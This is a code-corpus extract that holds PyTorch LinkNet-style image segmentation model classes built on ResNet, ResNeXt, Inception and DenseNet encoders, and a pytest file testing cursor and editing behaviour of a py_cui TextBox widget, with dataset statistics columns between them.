self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkNet101(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 2048]
resnet = models.resnet101(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
# self.firstconv = resnet.conv1
# assert num_channels == 3, "num channels not used now. to use changle first conv layer to support num channels other then 3"
# try to use 8-channels as first input
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkNeXt(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 2048]
# only pretrained
resnet = resnext101_32x4d(num_classes=1000, pretrained='imagenet')
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
self.stem = resnet.stem
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.stem,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.stem(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
# d4 = e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
# return F.sigmoid(f5)
return f5
class LinkNet152(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=3,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 2048]
resnet = models.resnet152(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
# self.firstconv = resnet.conv1
# assert num_channels == 3, "num channels not used now. to use changle first conv layer to support num channels other then 3"
# try to use 8-channels as first input
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkCeption(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
self.mean = (0.5, 0.5, 0.5)
self.std = (0.5, 0.5, 0.5)
filters = [64, 384, 384, 1024, 1536]
# only pre-trained
inception = inceptionv4(pretrained='imagenet')
if num_channels == 3:
self.stem1 = nn.Sequential(
inception.features[0],
inception.features[1],
inception.features[2],
)
else:
self.stem1 = nn.Sequential(
BasicConv2d(num_channels, 32, kernel_size=3, stride=2),
inception.features[1],
inception.features[2],
)
self.stem2 = nn.Sequential(
inception.features[3],
inception.features[4],
inception.features[5],
)
self.block1 = nn.Sequential(
inception.features[6],
inception.features[7],
inception.features[8],
inception.features[9],
)
self.tr1 = inception.features[10]
self.block2 = nn.Sequential(
inception.features[11],
inception.features[12],
inception.features[13],
inception.features[14],
inception.features[15],
inception.features[16],
inception.features[17],
)
self.tr2 = inception.features[18]
self.block3 = nn.Sequential(
inception.features[19],
inception.features[20],
inception.features[21]
)
# Decoder
self.decoder4 = DecoderBlockInception(in_channels=filters[4],
out_channels=filters[3],
n_filters=filters[3],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlockInception(in_channels=filters[3],
out_channels=filters[2],
n_filters=filters[2],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlockInception(in_channels=filters[2],
out_channels=filters[1],
n_filters=filters[1],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlockInception(in_channels=filters[1],
out_channels=filters[0],
n_filters=filters[0],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 1, stride=2)
self.finalnorm1 = nn.BatchNorm2d(32)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalnorm2 = nn.BatchNorm2d(32)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=0)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.stem1,
self.stem2,
self.block1,
self.tr1,
self.block2,
self.tr2,
self.block3]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
final_shape = x.shape[2:]
# Encoder
x = self.stem1(x)
e1 = self.stem2(x)
e2 = self.block1(e1)
e3 = self.tr1(e2)
e3 = self.block2(e3)
e4 = self.tr2(e3)
e4 = self.block3(e4)
# Decoder with Skip Connections
d4 = self.decoder4(e4)[:, :, 0:e3.size(2), 0:e3.size(3)] + e3
d3 = self.decoder3(d4)[:, :, 0:e2.size(2), 0:e2.size(3)] + e2
d2 = self.decoder2(d3)[:, :, 0:self.decoder2(e1).size(2), 0:self.decoder2(e1).size(3)] + self.decoder2(e1)
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f1 = self.finalnorm1(f1)
f2 = self.finalrelu1(f1)
f2 = self.finalnorm2(f2)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
out = F.interpolate(f5, size=final_shape, mode="bilinear")
return out
class LinkInceptionResNet(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=3,
**kwargs
):
super().__init__()
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
filters = [64, 192, 320, 1088, 2080]
# only pre-trained
ir = inceptionresnetv2(pretrained='imagenet', num_classes=1000)
if num_channels == 3:
self.stem1 = nn.Sequential(
ir.conv2d_1a,
ir.conv2d_2a,
ir.conv2d_2b,
)
else:
self.stem1 = nn.Sequential(
BasicConv2d(num_channels, 32, kernel_size=3, stride=2),
ir.conv2d_2a,
ir.conv2d_2b,
)
self.maxpool_3a = ir.maxpool_3a
self.stem2 = nn.Sequential(
ir.conv2d_3b,
ir.conv2d_4a,
)
self.maxpool_5a = ir.maxpool_5a
self.mixed_5b = ir.mixed_5b
self.mixed_6a = ir.mixed_6a
self.mixed_7a = ir.mixed_7a
self.skip1 = ir.repeat
self.skip2 = ir.repeat_1
self.skip3 = ir.repeat_2
# Decoder
self.decoder3 = DecoderBlockInception(in_channels=filters[4],
out_channels=filters[3],
n_filters=filters[3],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlockInception(in_channels=filters[3],
out_channels=filters[2],
n_filters=filters[2],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlockInception(in_channels=filters[2],
out_channels=filters[1],
n_filters=filters[1],
last_padding=0,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder0 = DecoderBlockInception(in_channels=filters[1],
out_channels=filters[0],
n_filters=filters[0],
last_padding=2,
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalnorm1 = nn.BatchNorm2d(32)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalnorm2 = nn.BatchNorm2d(32)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.stem1,
self.stem2,
self.mixed_5b,
self.mixed_6a,
self.mixed_7a,
self.skip1,
self.skip2,
self.skip3]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.stem1(x)
x1 = self.maxpool_3a(x)
x1 = self.stem2(x1)
x2 = self.maxpool_3a(x1)
x2 = self.mixed_5b(x2)
e1 = self.skip1(x2)
e1_resume = self.mixed_6a(e1)
e2 = self.skip2(e1_resume)
e2_resume = self.mixed_7a(e2)
e3 = self.skip3(e2_resume)
# Decoder with Skip Connections
d3 = self.decoder3(e3)[:, :, 0:e2.size(2), 0:e2.size(3)] + e2
d2 = self.decoder2(d3)[:, :, 0:e1.size(2), 0:e1.size(3)] + e1
d1 = self.decoder1(d2)[:, :, 0:x1.size(2), 0:x1.size(3)] + x1
d0 = self.decoder0(d1)
# Final Classification
f1 = self.finaldeconv1(d0)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkDenseNet161(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [384, 768, 2112, 2208]
densenet = models.densenet161(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
if num_channels == 3:
self.firstconv = densenet.features.conv0
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.stem = nn.Sequential(
self.firstconv,
densenet.features.norm0,
densenet.features.relu0,
densenet.features.pool0,
)
self.encoder1 = nn.Sequential(densenet.features.denseblock1)
self.encoder2 = nn.Sequential(densenet.features.transition1,
densenet.features.denseblock2)
self.encoder3 = nn.Sequential(densenet.features.transition2,
densenet.features.denseblock3)
self.encoder4 = nn.Sequential(densenet.features.transition3,
densenet.features.denseblock4)
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def require_encoder_grad(self, requires_grad):
blocks = [self.stem,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.stem(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkDenseNet121(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 1024]
densenet = models.densenet121(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
if num_channels == 3:
self.firstconv = densenet.features.conv0
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.stem = nn.Sequential(
self.firstconv,
densenet.features.norm0,
densenet.features.relu0,
densenet.features.pool0,
)
self.encoder1 = nn.Sequential(densenet.features.denseblock1)
self.encoder2 = nn.Sequential(densenet.features.transition1,
densenet.features.denseblock2)
self.encoder3 = nn.Sequential(densenet.features.transition2,
densenet.features.denseblock3)
self.encoder4 = nn.Sequential(densenet.features.transition3,
densenet.features.denseblock4)
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def require_encoder_grad(self, requires_grad):
blocks = [self.stem,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.stem(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class CoarseLinkNet50(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 2048]
resnet = models.resnet50(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
# self.firstconv = resnet.conv1
# assert num_channels == 3, "num channels not used now. to use changle first conv layer to support num channels other then 3"
# try to use 8-channels as first input
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finalconv1 = nn.Conv2d(filters[0], 32, 2, padding=1)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finalconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
return f3
| 35.73301
| 184
| 0.51551
| 4,500
| 44,166
| 4.910667
| 0.063556
| 0.050683
| 0.042312
| 0.045796
| 0.876324
| 0.866459
| 0.857498
| 0.857498
| 0.85243
| 0.85071
| 0
| 0.067053
| 0.394557
| 44,166
| 1,236
| 185
| 35.73301
| 0.759349
| 0.054997
| 0
| 0.840717
| 0
| 0
| 0.00389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060127
| false
| 0
| 0.008439
| 0
| 0.093882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a22d999535acfe333a40e0208848123a290fbab
| 3,778
|
py
|
Python
|
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_text_box.py
|
telday/py_cui
|
9f7a5f9a72733effd5e50322774988ca998a5e8a
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
import py_cui
grid_test = py_cui.grid.Grid(10, 10, 100, 100)
def test_move_right():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
text_box.move_right()
assert text_box.cursor_text_pos == 1
assert text_box.cursor_x == 13
def test_move_left_side():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
temp = text_box.cursor_x
text_box.cursor_x = text_box.cursor_x + 5
text_box.cursor_text_pos = 5
text_box.move_left()
assert text_box.cursor_text_pos == 4
assert text_box.cursor_x == (temp + 5 - 1)
def test_clear():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
text_box.clear()
assert text_box.get() == ''
assert text_box.cursor_text_pos == 0
assert text_box.cursor_x == 12
def test_get_initial():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
assert text_box.cursor_text_pos == 0
assert text_box.cursor_x == 12
assert text_box.get() == 'Hello World'
assert text_box.cursor_max_left == 12
assert text_box.cursor_max_right == 27
def test_insert_char():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
text_box.insert_char(py_cui.keys.KEY_D_UPPER)
assert text_box.get() == 'DHello World'
assert text_box.cursor_x == text_box.cursor_max_left + 1
assert text_box.cursor_text_pos == 1
def test_erase_char():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
for i in range(0,2):
text_box.move_right()
text_box.erase_char()
assert text_box.cursor_x == text_box.cursor_max_left + 1
assert text_box.cursor_text_pos == 1
assert text_box.get() == 'Hllo World'
def test_get_edited():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
for i in range(0, 3):
text_box.move_right()
text_box.erase_char()
text_box.insert_char(py_cui.keys.KEY_A_LOWER)
text_box.insert_char(py_cui.keys.KEY_E_UPPER)
assert text_box.cursor_x == text_box.cursor_max_left + 4
assert text_box.cursor_text_pos == 4
assert text_box.get() == 'HeaElo World'
def test_jump_to_start():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
for i in range(0, 4):
text_box.move_right()
text_box.jump_to_start()
assert text_box.get() == 'Hello World'
assert text_box.cursor_text_pos == 0
assert text_box.cursor_x == 12
def test_jump_to_end():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
text_box.jump_to_end()
assert text_box.cursor_text_pos == 11
assert text_box.cursor_x == text_box.cursor_max_left + 11
def test_move_right_overflow():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 1, 1, 0 , 'Hello World!!!')
for i in range(0, 20):
text_box.move_right()
assert text_box.cursor_text_pos == 14
assert text_box.cursor_x == text_box.cursor_max_left + 5
def test_move_left_overflow():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
text_box.move_left()
assert text_box.cursor_text_pos == 0
assert text_box.cursor_x == 12
def test_set_text():
text_box = py_cui.widgets.TextBox('id', 'Test', grid_test, 1, 1, 1, 2, 1, 0 , 'Hello World')
for i in range(0, 7):
text_box.move_right()
text_box.set_text('Hi')
assert text_box.get() == 'Hi'
assert text_box.cursor_text_pos == 2
assert text_box.cursor_x == text_box.cursor_max_left + 2
| 35.980952
| 99
| 0.67099
| 662
| 3,778
| 3.510574
| 0.101208
| 0.216867
| 0.201377
| 0.212565
| 0.832186
| 0.802496
| 0.760327
| 0.760327
| 0.680293
| 0.669966
| 0
| 0.04325
| 0.192165
| 3,778
| 104
| 100
| 36.326923
| 0.718218
| 0
| 0
| 0.447059
| 0
| 0
| 0.070672
| 0
| 0
| 0
| 0
| 0
| 0.388235
| 1
| 0.141176
| false
| 0
| 0.023529
| 0
| 0.164706
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a39fa054a7ffdfc95ebc5723984fd9c982177fb
| 24,860
|
py
|
Python
|
